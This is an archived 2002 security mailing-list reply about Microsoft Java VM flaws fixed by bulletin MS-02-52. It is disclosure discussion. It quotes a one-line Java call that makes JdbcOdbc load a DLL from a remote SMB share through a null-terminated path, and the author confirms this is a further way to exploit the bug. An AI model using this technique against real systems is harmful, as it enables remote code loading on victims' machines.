Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52
From: Jouko Pynnonen (jouko@SOLUTIONS.FI)Date: 09/23/02
- Previous message: Georgi Guninski: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- In reply to: Georgi Guninski: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 23 Sep 2002 18:41:15 +0300 From: Jouko Pynnonen <jouko@SOLUTIONS.FI> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
On Mon, 23 Sep 2002, Georgi Guninski wrote:
> Does
> new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
> work?
Yes, seems to work, so there's another way to exploit this one. It
requires that browsing internet shares works, which may limit the systems
where it can be exploited. Although there were other Java vulnerabilities
involving the use of shares, I never came to think about this way. MS may
have thought of this, but of course they don't mention this kind of
things during the "co-operation".
-- Jouko Pynnonen Online Solutions Ltd Secure your Linux - jouko@solutions.fi http://www.solutions.fi http://www.secmod.com
- Previous message: Georgi Guninski: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- In reply to: Georgi Guninski: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
